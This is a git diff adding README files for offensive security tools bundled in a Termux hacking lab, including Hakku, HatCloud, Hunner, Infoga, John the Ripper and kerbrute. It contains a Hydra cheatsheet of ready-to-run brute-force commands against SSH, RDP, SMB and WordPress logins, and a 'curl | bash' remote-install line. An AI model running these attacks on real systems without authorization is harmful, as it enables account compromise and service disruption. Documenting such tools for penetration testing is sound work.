+ +#### Modules +total count of modules: 24 + +* apache_users +* arp_dos +* arp_monitor +* arp_spoof +* bluetooth_pod +* cloudflare_resolver +* dhcp_dos +* dir_scanner +* dns_spoof +* email_bomber +* hostname_resolver +* mac_spoof +* mitm +* network_kill +* pma_scanner +* port_scanner +* proxy_scout +* whois +* web_killer +* web_scout +* wifi_jammer +* zip_cracker +* rar_cracker +* wordlist_gen + +#### Dependencies +Hakku framework itself doesn't need anything more than Python 3.5, but its network scanner requires tcpdump. +Hakku includes all Python dependencies so you don't have to install them. +All module dependencies are listed below. +ethtool, aircrack-ng, ettercap-text-only, dsniff, xterm, driftnet, tcpdump, libnetfilter-queue-dev, python3.5-dev, hcitool, sslstrip, l2ping + +#### Web pages + +* Official website: http://hakkuproject.org +* Official wiki: https://github.com/4shadoww/hakkuframework/wiki/ +* Github: https://github.com/4shadoww/hakkuframework/ +* SourceForge: https://sourceforge.net/projects/hakkuframework/ + +#### Contact +If you do have any questions etc. about Hakku Framework, then I don't mind if you send me an email. 
+ +* email: 4shadoww0@gmail.com +* bug reports to github or here: 4shadoww0@gmail.com + +Hakku Framework is under MIT license + +[build]: https://img.shields.io/travis/4shadoww/hakkuframework.svg?style=flat-square +[build link]: https://travis-ci.org/4shadoww/hakkuframework +[license]: https://img.shields.io/badge/license-MIT-blue.svg?style=flat-square +[python]: https://img.shields.io/badge/python-3.5-brightgreen.svg?style=flat-square \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md new file mode 100755 index 00000000..9b3dd816 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md @@ -0,0 +1,37 @@ +# hasher 3.0.1(alpha) + +Hasher is a Hash Cracker that has supported more than 7 types of hashes + +# hasher feature +- [x] auto detect hash +- [x] supports windows and linux platforms +- [x] fast decrypt +- [x] list of supported hashes: +``` +- md4 +- md5 +- sha1 +- sha224 +- sha256 +- sha384 +- sha512 +- ripemd160 +- whirlpool +- mysql 3.2.3 +- mysql 4.1 +- mssql2000 +- mssql2005 +- nthash +- lmhash +- ntlm hash +``` +# [ Installation ] +``` +$ apt update upgrade +$ apt install python2 git +$ git clone https://github.com/ciku370/hasher +$ cd hasher +$ python2 hash.py +``` +# Screenshot + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md new file mode 100755 index 00000000..5260126d --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md @@ -0,0 +1,65 @@ +# hash-identifier + +![alt text](https://raw.githubusercontent.com/blackploit/hash-identifier/master/screenshots/hash_id_v1.2.png) + +Software to identify the different types of hashes used to encrypt data and especially passwords. 
+ +Encryption formats supported: + +* ADLER-32 +* CRC-32 +* CRC-32B +* CRC-16 +* CRC-16-CCITT +* DES(Unix) +* FCS-16 +* GHash-32-3 +* GHash-32-5 +* GOST R 34.11-94 +* Haval-160 +* Haval-192 110080 ,Haval-224 114080 ,Haval-256 +* Lineage II C4 +* Domain Cached Credentials +* XOR-32 +* MD5(Half) +* MD5(Middle) +* MySQL +* MD5(phpBB3) +* MD5(Unix) +* MD5(Wordpress) +* MD5(APR) +* Haval-128 +* MD2 +* MD4 +* MD5 +* MD5(HMAC(Wordpress)) +* NTLM +* RAdmin v2.x +* RipeMD-128 +* SNEFRU-128 +* Tiger-128 +* MySQL5 - SHA-1(SHA-1($pass)) +* MySQL 160bit - SHA-1(SHA-1($pass)) +* RipeMD-160 +* SHA-1 +* SHA-1(MaNGOS) +* Tiger-160 +* Tiger-192 +* md5($pass.$salt) - Joomla +* SHA-1(Django) +* SHA-224 +* RipeMD-256 +* SNEFRU-256 +* md5($pass.$salt) - Joomla +* SAM - (LM_hash:NT_hash) +* SHA-256(Django) +* RipeMD-320 +* SHA-384 +* SHA-256 +* SHA-384(Django) +* SHA-512 +* Whirlpool +* And more… + + +Encryption algorithms that can not be differentiated unless they have been decrypted, so the efficiency of the software also depends on the user's criteria. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md new file mode 100755 index 00000000..3bf4030b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md @@ -0,0 +1,34 @@ +# HatCloud + +HatCloud build in Ruby. It makes bypass in CloudFlare for discover real IP. +This can be useful if you need test your server and website. Testing your protection against Ddos (Denial of Service) or Dos. +CloudFlare is services and distributed domain name server services, sitting between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites. +Your network protects, speeds up and improves availability for a website or the mobile application with a DNS change. + +Version: 1.0 + +Use: +ruby hatcloud.rb -h or --help
+ruby hatcloud.rb -b your site
+or
+ruby hatcloud.rb --byp your site
+ + + +HatCloud, um simples script criado em Ruby para realizar um bypass no CloudFlare, descobrindo seu endereço de IP real. +Isto pode ser útil para você testar o seu servidor e seu site. Testando sua proteção contra Ddos ou Dos (negação de serviço) . + +CloudFlare fornece uma rede de entrega de conteúdo e serviços distribuídos de DNS, sendo o intermediário entre o visitante e o +provedor de hospedagem do usuário da Cloudflare, atuando como um proxy reverso para website. A sua rede protege, acelera e melhora a +disponibilidade de um website ou aplicação móvel com uma mudança no DNS. + +Versão: 1.0 + +Uso: +ruby hatcloud.rb -b seu site
+ou
+ruby hatcloud.rb --byp seu site
+ +#Screenshot +
+ diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md new file mode 100755 index 00000000..af2daa42 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md @@ -0,0 +1,11 @@ +# Hunner +Hacking framework +This framework is designed to perform penetration testing. +Its functions: +1) Scan sql vulnerability +2) Scan xxs vulnerability +3) Dos sites +4) Brutforce Ftp +5) Brutforse SSh +6) Brutforse mail Accounts +# Donate BTC: 1K96gLXbmgRhE7DsU33HFBuvohDgei5Z22 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md new file mode 100755 index 00000000..dfc7d4eb --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md @@ -0,0 +1,25 @@ +# Hydra-Cheatsheet +Hydra Password Cracking Cheetsheet + +The following table uses the $ip variable which can be set with the following command: + +`export ip 10.10.10.1` + +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| +| Command | Description | +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| +| hydra -P password-file.txt -v $ip snmp | Hydra brute force against SNMP | +| hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp | Hydra FTP known user and rockyou password list | +| hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh | Hydra SSH using list of users and passwords | +| hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh | Hydra SSH using a known password and a username list | +| hydra $ip -s 22 ssh -l -P big_wordlist.txt | Hydra SSH Against Known username on port 22 | +| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V | Hydra 
POP3 Brute Force | +| hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V | Hydra SMTP Brute Force | +| hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin | Hydra attack http get 401 login with a dictionary | +| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip | Hydra attack Windows Remote Desktop with rockyou | +| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb | Hydra brute force SMB user with rockyou: | +| hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | Hydra brute force a Wordpress admin login | +| hydra -L usernames.txt -P passwords.txt $ip smb -V -f | SMB Brute Forcing | +| hydra -L users.txt -P passwords.txt $ip ldap2 -V -f | LDAP Brute Forcing | +|-------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------| + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md new file mode 100755 index 00000000..c70b909b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md @@ -0,0 +1,111 @@ +# i-Haklab v.3.0 2021 by @Ivam3 + + DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. +Ivam3 is not responsible for the misuse that can be given to everything that this laboratory entails + +To get help about how to use it join to irc chat in i-Haklab command : + + $ i-Haklab weechat + +To report some issues join to >> https://t.me/Ivam3_Bot + +# What is i-Haklab ? + +- i-Haklab is a hacking laboratory for Termux that contains open source tools for pentesting, scan/find vulnerabilities, explotation and post-explotation recommended by Ivam3 with automation hacking commands and many guides and tutorials to learn use it. 
i-Haklab use oh my fish insteractive shell, to get help about its use going to >> https://fishshell.com/docs/current/tutorial.html. + +# Process during installation + +i-Haklab will ...... +- check if your android device has some root, if so, it will install the sudo command. +- check if termux has permission to access the external memory, thus, in there it will create a directory called 'tools' and there will install the tools and/or frameworks. otherwise they will be installed in the directory /data/data/com.termux/files/usr/share/tools. By the way, in case of Termux is installed in a second partition of your external memory those will be in /data/sdext2/data/com.termux/files/use/share/tools. +- i-Haklab has more than 80 tools of which only the main ones are installed (15) with a total weight of 3.9GB. -DoS-A-Tool -ExiF -Binchecker -Blackbox -Crunch -Torvpn -Tmate -Evilurl -Translate -Metasploit -EMBED -Java -Hydra -XHydra -Wireshark -Nmap -H8mail -Objection So, you can see the list of all tools available under the command: + + ]> i-Haklab list + +- The rest of the tools can be installed or uninstalled by: + + ]> i-Haklab install/remove + +- Either install or uninstall all at once: + + ]> i-Haklab install/remove alltools + +- Once tools/frameworks installation ended the OMF shell configuration will the next. on it, i-Haklab will activate the OMF shell, and you will notice it when a welcome message to the new shell appears ... when this happens you will have to wait 2min and execute the command "exit "for the continuation of its installation. + +- At the end of its installation you will only have to restart Termux and it will show an loggin screen asking you for the access key, which by default will be "Ivam3byCinderella", and can be modified from its configuration menu that is shown when using "IbyC" as the access key. 
+ +# COMMANDS + +There are several commands in i-Haklab that facilitate the use of Termux: + +- i-Haklab: it is the main command that helps to update and use i-Haklab with automations of various processes such as the installation/uninstallation of tools, visualization of user guides for the tools, download of hacking books, access to the community tutorials, payload creation automation, metaploit handler activation, brute force attacks among others. + +- run: facilitates the execution of all external tools adapted to Termux by i-Haklab. Termux natives such as nmap run directly. + +- LOCALHOST: returns the private ip of your local network + +- omf theme name-of-theme: change the shell theme. + +- tornvpn: enable tor connection by proxychains4. + +- sudo some-commands: run commands as fake root user. + +- serverphp: activates the php server. + +- serverapache: activates the apache server. + +- postgresql start / stop / restart: enables stops and restarts the metasploit database. + +- traductor: init a shell to traslate any text. + +- vncserver: init a GUI client-server. + +- vncserver kill :1: kill the client-server. + +- IbyC-fixer: we know that each Android is different and this can generate various errors in the installation processes of ruby gems, python modules, among others. And this command is the i-Haklab solver that automates the solving processes. + +- lock: Block the termux screen and it will only be unlocked with said password or answering the security question. It is worth mentioning that these access codes are encrypted for your security. + + +# IRC CHAT Ivam3byCinderella + +IRC (Internet Relay Chat) is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model. Under the command we will find the argument, with which you can join the official IRC Ivam3byCinderella where u can contact another i-Haklab. 
+ +**** If you want to suggest some tool, do it in the section of suggestions of community bot in https://t.me/Ivam3_Bot + +# BOOKS AVAILABLES + +- Aprende html +- Chema alonso coleccion +- Comandos basicos linux +- Cracking sin secretos +- Conviertete en hacker by incube2 +- Ethical hacking +- Hacking con python +- Hacking etico 101 +- Hacking mexico seguridadofensiva nv.1 +- Hacking the hacker +- Manual hacking dispositivos moviles +- Metasploit para pentesters +- My sql +- Nmap by computaxion +- Programa en C +- Programa en C++ +- Programa en bash +- Programacion en perl +- Programacion en php +- Programacion en ruby +- Python para todos + +**** If you want to suggest some book do it in the section of suggestions of my bot in https://t.me/Ivam3_Bot + +# UPDATE AT NEWEST VERSION + +i-Haklab is constantly updating tools and improvements. To stay updated you just have to run: + + ]> i-Haklab update + +*** HAVE A NICE HACKING DAY!!!! + +# @Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md new file mode 100755 index 00000000..de5ed695 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md @@ -0,0 +1,73 @@ +## Infoga - Email OSINT + +Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet. + + ![screen](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/main.png) + +## Installation + +``` +$ git clone https://github.com/m4ll0k/Infoga.git +$ cd Infoga +$ python setup.py install +$ python infoga.py +``` +## Python 2 Support +As of January 1st, 2020 no new bug reports, fixes, or changes will be made to Python 2, and Python 2 is no longer supported. 
+This means there are no new updates for Python 2, and updated versions of operating systems no longer support Python 2. +However, you can still use the tool: +``` +$ git clone https://github.com/m4ll0k/Infoga.git +$ cd Infoga +$ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py +$ python get-pip.py +$ pip2 install -r requirements.txt +$ python setup.py install + +``` + +### This script is tested on Kali Linux, Parrot OS and Ubuntu + +## Usage + +``` +$ python infoga.py --domain nsa.gov --source all --breach -v 2 --report ../nsa_gov.txt +``` + +![run_1](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/run_2.png) + + +``` +$ python infoga.py --info m4ll0k@protonmail.com --breach -v 3 --report ../m4ll0k.txt +``` + +![info](https://raw.githubusercontent.com/m4ll0k/Infoga/master/screen/image_5.png) + + +## Support Docker +### Install Docker Linux +Install Docker +```sh +curl -fsSL https://get.docker.com | bash +``` +> To use Docker you need superuser privileges + +### Build Image infoga +To create the image +```sh +docker build -t "infoga:1" . 
+``` +> **infoga** is the name of the image and **1** is the version + +### Using infoga +For usage +```sh +docker run -it --rm "infoga:1" --domain target --source all --breach -v 2 +``` +> target is the site + +### Adding persistent volume +For example +```sh +docker run -it --rm "infoga:1" -v /tmp/infoga-report:/tmp --domain target --source all --breach -v 2 --report /tmp/report.txt +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md new file mode 100755 index 00000000..03c7c65d --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md @@ -0,0 +1,140 @@ +# IPGeoLocation +==== +* A tool to retrieve IP Geolocation information +* Powered by [ip-api](http://ip-api.com/docs/) + + +Requirements +===== +* Python 3.x +* termcolor +* colorama + + +Download/Installation +==== +* git clone https://github.com/maldevel/IPGeoLocation +* pip3 install -r requirements.txt --user + +if pip3 is missing: +* apt-get install python3-setuptools +* easy_install3 pip +* pip3 install -r requirements.txt + + +Features +==== +* Retrieve IP or Domain Geolocation. +* Retrieve your own IP Geolocation. +* Retrieve Geolocation for IPs or Domains loaded from file. Each target in new line. +* Define your own custom User Agent string. +* Select random User-Agent strings from file. Each User Agent string in new line. +* Proxy support. +* Select random proxy from file. Each proxy URL in new line. +* Open IP geolocation in Google Maps using the default browser. +* Export results to csv, xml and txt format. 
+ + +Geolocation Information +==== +* ASN +* City +* Country +* Country Code +* ISP +* Latitude +* Longtitude +* Organization +* Region Code +* Region Name +* Timezone +* Zip Code + + +Usage +==== +``` +$ ./ip2geolocation.py +usage: ipgeolocation.py [-h] [-m] [-t TARGET] [-T file] [-u User-Agent] + [-U file] [-g] [--noprint] [-v] [--nolog] [-x PROXY] + [-X file] [-e file] [-ec file] [-ex file] + +IPGeolocation 2.0.4 + +--[ Retrieve IP Geolocation information from ip-api.com +--[ Copyright (c) 2015-2016 maldevel (@maldevel) +--[ ip-api.com service will automatically ban any IP addresses doing over 150 requests per minute. + +optional arguments: + -h, --help show this help message and exit + -m, --my-ip Get Geolocation info for my IP address. + -t TARGET, --target TARGET + IP Address or Domain to be analyzed. + -T file, --tlist file + A list of IPs/Domains targets, each target in new line. + -u User-Agent, --user-agent User-Agent + Set the User-Agent request header (default: IP2GeoLocation 2.0.3). + -U file, --ulist file + A list of User-Agent strings, each string in new line. + -g Open IP location in Google maps with default browser. + --noprint IPGeolocation will print IP Geolocation info to terminal. It is possible to tell IPGeolocation n +ot to print results to terminal with this option. + -v, --verbose Enable verbose output. + --nolog IPGeolocation will save a .log file. It is possible to tell IPGeolocation not to save those log +files with this option. + -x PROXY, --proxy PROXY + Setup proxy server (example: http://127.0.0.1:8080) + -X file, --xlist file + A list of proxies, each proxy url in new line. + -e file, --txt file Export results. + -ec file, --csv file Export results in CSV format. + -ex file, --xml file Export results in XML format. 
+``` + + +Examples +==== +**Retrieve your IP Geolocation** +* ./ip2geolocation.py -m + +**Retrieve IP Geolocation** +* ./ip2geolocation.py -t x.x.x.x + +**Retrieve Domain Geolocation** +* ./ip2geolocation.py -t example.com + +**Do not save .log files** +* ./ip2geolocation.py -t example.com --nolog + +**Custom User Agent string** +* ./ip2geolocation.py -t x.x.x.x -u "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" + +**Using Proxy** +* ./ip2geolocation.py -t x.x.x.x -x http://127.0.0.1:8080 + +**Using random Proxy** +* ./ip2geolocation.py -t x.x.x.x -X /path/to/proxies/filename.txt + +**Pick User-Agent string randomly** +* ./ip2geolocation.py -t x.x.x.x -U /path/to/user/agent/strings/filename.txt + +**Retrieve IP geolocation and open location in Google maps with default browser** +* ./ip2geolocation.py -t x.x.x.x -g + +**Export results to CSV file** +* ./ip2geolocation.py -t x.x.x.x --csv /path/to/results.csv + +**Export results to XML file** +* ./ip2geolocation.py -t x.x.x.x --xml /path/to/results.xml + +**Export results to TXT file** +* ./ip2geolocation.py -t x.x.x.x -e /path/to/results.txt + +**Retrieve IP Geolocation for many targets** +* ./ip2geolocation.py -T /path/to/targets/targets.txt + +**Retrieve IP Geolocation for many targets and export results to xml** +* ./ip2geolocation.py -T /path/to/targets/targets.txt --xml /path/to/results.xml + +**Do not print results to terminal** +* ./ip2geolocation.py -m -e /path/to/results.txt --noprint diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md new file mode 100755 index 00000000..3a6a2569 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md @@ -0,0 +1,187 @@ +[![Build Status](https://travis-ci.com/magnumripper/JohnTheRipper.svg?branch=bleeding-jumbo)](https://travis-ci.com/magnumripper/JohnTheRipper) +[![Circle 
CI](https://circleci.com/gh/magnumripper/JohnTheRipper/tree/bleeding-jumbo.svg?style=shield)](https://circleci.com/gh/magnumripper/JohnTheRipper/tree/bleeding-jumbo) +[![Downloads](https://img.shields.io/badge/Download-Windows%20Build-blue.svg)](https://github.com/claudioandre-br/JohnTheRipper/releases/tag/jumbo-dev) +[![License](https://img.shields.io/badge/License-GPL%20v2%2B-blue.svg)](https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/doc/LICENSE) +[![LoC](https://tokei.rs/b1/github/magnumripper/JohnTheRipper?category=code)](https://github.com/magnumripper/JohnTheRipper/tree/bleeding-jumbo) +[![Contributors](https://img.shields.io/github/contributors/magnumripper/JohnTheRipper.svg?label=Contributors)](https://github.com/magnumripper/JohnTheRipper/graphs/contributors) +[![Search hit](https://img.shields.io/github/search/magnumripper/JohnTheRipper/goto.svg?label=GitHub%20Hits)](https://github.com/search?utf8=%E2%9C%93&q=john%20the%20ripper&type=) + +John the Ripper +=============== + +This is the community-enhanced, "jumbo" version of John the Ripper. +It has a lot of code, documentation, and data contributed by jumbo +developers and the user community. It is easy for new code to be added +to jumbo, and the quality requirements are low, although lately we've +started subjecting all contributions to quite some automated testing. +This means that you get a lot of functionality that is not necessarily +"mature", which in turn means that bugs in this code are to be expected. + +John the Ripper homepage is: + +https://www.openwall.com/john/ + +If you have any comments on this release or on JtR in general, please +join the john-users mailing list and post in there: + +https://www.openwall.com/lists/john-users/ + +For contributions to John the Ripper jumbo, please use pull requests on +GitHub: + +https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/CONTRIBUTING.md + +Included below is basic John the Ripper core documentation. 
+ +--- + + John the Ripper password cracker. + +John the Ripper is a fast password cracker, currently available for +many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter +requires a contributed patch). Its primary purpose is to detect weak +Unix passwords. Besides several crypt(3) password hash types most +commonly found on various Unix flavors, supported out of the box are +Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus +hundreds of additional hashes and ciphers in "-jumbo" versions. + + + How to install. + +See INSTALL for information on installing John on your system. + + + How to use. + +To run John, you need to supply it with some password files and +optionally specify a cracking mode, like this, using the default order +of modes and assuming that "passwd" is a copy of your password file: + + john passwd + +or, to restrict it to the wordlist mode only, but permitting the use +of word mangling rules: + + john --wordlist=password.lst --rules passwd + +Cracked passwords will be printed to the terminal and saved in the +file called $JOHN/john.pot (in the documentation and in the +configuration file for John, "$JOHN" refers to John's "home +directory"; which directory it really is depends on how you installed +John). The $JOHN/john.pot file is also used to not load password +hashes that you already cracked when you run John the next time. + +To retrieve the cracked passwords, run: + + john --show passwd + +While cracking, you can press any key for status, or 'q' or Ctrl-C to +abort the session saving its state to a file ($JOHN/john.rec by +default). If you press Ctrl-C for a second time before John had a +chance to complete handling of your first Ctrl-C, John will abort +immediately without saving. By default, the state is also saved every +10 minutes to permit for recovery in case of a crash. + +To continue an interrupted session, run: + + john --restore + +These are just the most essential things you can do with John. 
For +a complete list of command line options and for more complicated usage +examples you should refer to OPTIONS and EXAMPLES, respectively. + +Please note that "binary" (pre-compiled) distributions of John may +include alternate executables instead of just "john". You may need to +choose the executable that fits your system best, e.g. "john-omp" to +take advantage of multiple CPUs and/or CPU cores. + + + Features. + +John the Ripper is designed to be both feature-rich and fast. It +combines several cracking modes in one program and is fully +configurable for your particular needs (you can even define a custom +cracking mode using the built-in compiler supporting a subset of C). +Also, John is available for several different platforms which enables +you to use the same cracker everywhere (you can even continue a +cracking session which you started on another platform). + +Out of the box, John supports (and autodetects) the following Unix +crypt(3) hash types: traditional DES-based, "bigcrypt", BSDI extended +DES-based, FreeBSD MD5-based (also used on Linux and in Cisco IOS), and +OpenBSD Blowfish-based (now also used on some Linux distributions and +supported by recent versions of Solaris). Also supported out of the box +are Kerberos/AFS and Windows LM (DES-based) hashes, as well as DES-based +tripcodes. + +When running on Linux distributions with glibc 2.7+, John 1.7.6+ +additionally supports (and autodetects) SHA-crypt hashes (which are +actually used by recent versions of Fedora and Ubuntu), with optional +OpenMP parallelization (requires GCC 4.2+, needs to be explicitly +enabled at compile-time by uncommenting the proper OMPFLAGS line near +the beginning of the Makefile). 
+ +Similarly, when running on recent versions of Solaris, John 1.7.6+ +supports and autodetects SHA-crypt and SunMD5 hashes, also with +optional OpenMP parallelization (requires GCC 4.2+ or recent Sun Studio, +needs to be explicitly enabled at compile-time by uncommenting the +proper OMPFLAGS line near the beginning of the Makefile and at runtime +by setting the OMP_NUM_THREADS environment variable to the desired +number of threads). + +"-jumbo" versions add support for hundreds of additional hash and cipher +types, including fast built-in implementations of SHA-crypt and SunMD5, +Windows NTLM (MD4-based) password hashes, various macOS and Mac OS X +user password hashes, fast hashes such as raw MD5, SHA-1, SHA-256, and +SHA-512 (which many "web applications" historically misuse for +passwords), various other "web application" password hashes, various SQL +and LDAP server password hashes, and lots of other hash types, as well +as many non-hashes such as SSH private keys, S/Key skeykeys files, +Kerberos TGTs, encrypted filesystems such as macOS .dmg files and +"sparse bundles", encrypted archives such as ZIP (classic PKZIP and +WinZip/AES), RAR, and 7z, encrypted document files such as PDF and +Microsoft Office's - and these are just some examples. To load some of +these larger files for cracking, a corresponding bundled *2john program +should be used first, and then its output fed into JtR -jumbo. + + + Graphical User Interface (GUI). + +There is an official GUI for John the Ripper: Johnny. + +Despite the fact that Johnny is oriented onto JtR core, all basic +functionality is supposed to work in all versions, including jumbo. + +Johnny is a separate program, therefore you need to have John the Ripper +installed in order to use it. + +More information about Johnny and its releases is on the wiki: + +https://openwall.info/wiki/john/johnny + + + Documentation. 
+
+The rest of documentation is located in separate files, listed here in
+the recommended order of reading:
+
+* INSTALL - installation instructions
+* OPTIONS - command line options and additional utilities
+* MODES - cracking modes: what they are
+* CONFIG (*) - how to customize
+* RULES (*) - wordlist rules syntax
+* EXTERNAL (*) - defining an external mode
+* EXAMPLES - usage examples - strongly recommended
+* FAQ - guess
+* CHANGES (*) - history of changes
+* CONTACT (*) - how to contact the author or otherwise obtain support
+* CREDITS (*) - credits
+* LICENSE - copyrights and licensing terms
+* COPYING - GNU GPL version 2, as referenced by LICENSE above
+
+(*) most users can safely skip these.
+
+There are a lot of additional documentation files in jumbo's "doc"
+directory, which you'll also want to explore.
+
+Happy reading!
diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md
new file mode 100755
index 00000000..6fa4ca2a
--- /dev/null
+++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md
@@ -0,0 +1,60 @@
+# kerbrute
+A script to perform Kerberos brute-forcing by using the Impacket library.
+
+When it is executed, it receives as input a user or a list of users and a password or a list of passwords. Then it performs a brute-force attack to enumerate:
+* Valid username/password pairs
+* Valid usernames
+* Usernames without pre-authentication required
+
+As a result, the script generates a list of the valid credentials discovered, and the TGTs generated from those valid credentials.
+
+## Installation
+
+To install:
+```
+git clone https://github.com/TarlogicSecurity/kerbrute
+cd kerbrute
+pip install -r requirements.txt
+```
+
+## Use
+
+Help without arguments:
+```shell
+root@kali:kerbrute# python kerbrute.py
+Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
+
+usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
+                   [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
+                   [-dc-ip ] [-threads THREADS]
+                   [-outputfile OUTPUTFILE] [-no-save-ticket]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -debug                Turn DEBUG output ON
+  -user USER            User to perform bruteforcing
+  -users USERS          File with user per line
+  -password PASSWORD    Password to perform bruteforcing
+  -passwords PASSWORDS  File with password per line
+  -domain DOMAIN        Domain to perform bruteforcing
+  -dc-ip IP             Address of the domain controller
+  -threads THREADS      Number of threads to perform bruteforcing. Default = 1
+  -outputfile OUTPUTFILE
+                        File to save discovered user:password
+  -no-save-ticket       Do not save retrieved TGTs with correct credentials
+
+Examples:
+  ./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
+```
+
+Example of execution:
+```shell
+root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
+Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
+
+[*] Stupendous => triceratops:Sh4rpH0rns
+[*] Saved TGT in triceratops.ccache
+[*] Valid user => velociraptor [NOT PREAUTH]
+[*] Valid user => trex
+[*] Saved discovered passwords in jurassic_passwords.txt
+```
diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md
new file mode 100755
index 00000000..9c829f00
--- /dev/null
+++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md
@@ -0,0 +1,70 @@
+# localtunnel-server
+
+[![Build 
Status](https://travis-ci.org/localtunnel/server.svg?branch=master)](https://travis-ci.org/localtunnel/server) + +localtunnel exposes your localhost to the world for easy testing and sharing! No need to mess with DNS or deploy just to have others test out your changes. + +This repo is the server component. If you are just looking for the CLI localtunnel app, see (https://github.com/localtunnel/localtunnel). + +## overview ## + +The default localtunnel client connects to the `localtunnel.me` server. You can, however, easily set up and run your own server. In order to run your own localtunnel server you must ensure that your server can meet the following requirements: + +* You can set up DNS entries for your `domain.tld` and `*.domain.tld` (or `sub.domain.tld` and `*.sub.domain.tld`). +* The server can accept incoming TCP connections for any non-root TCP port (i.e. ports over 1000). + +The above are important as the client will ask the server for a subdomain under a particular domain. The server will listen on any OS-assigned TCP port for client connections. + +#### setup + +```shell +# pick a place where the files will live +git clone git://github.com/defunctzombie/localtunnel-server.git +cd localtunnel-server +npm install + +# server set to run on port 1234 +bin/server --port 1234 +``` + +The localtunnel server is now running and waiting for client requests on port 1234. You will most likely want to set up a reverse proxy to listen on port 80 (or start localtunnel on port 80 directly). + +**NOTE** By default, localtunnel will use subdomains for clients, if you plan to host your localtunnel server itself on a subdomain you will need to use the _--domain_ option and specify the domain name behind which you are hosting localtunnel. (i.e. my-localtunnel-server.example.com) + +#### use your server + +You can now use your domain with the `--host` flag for the `lt` client. 
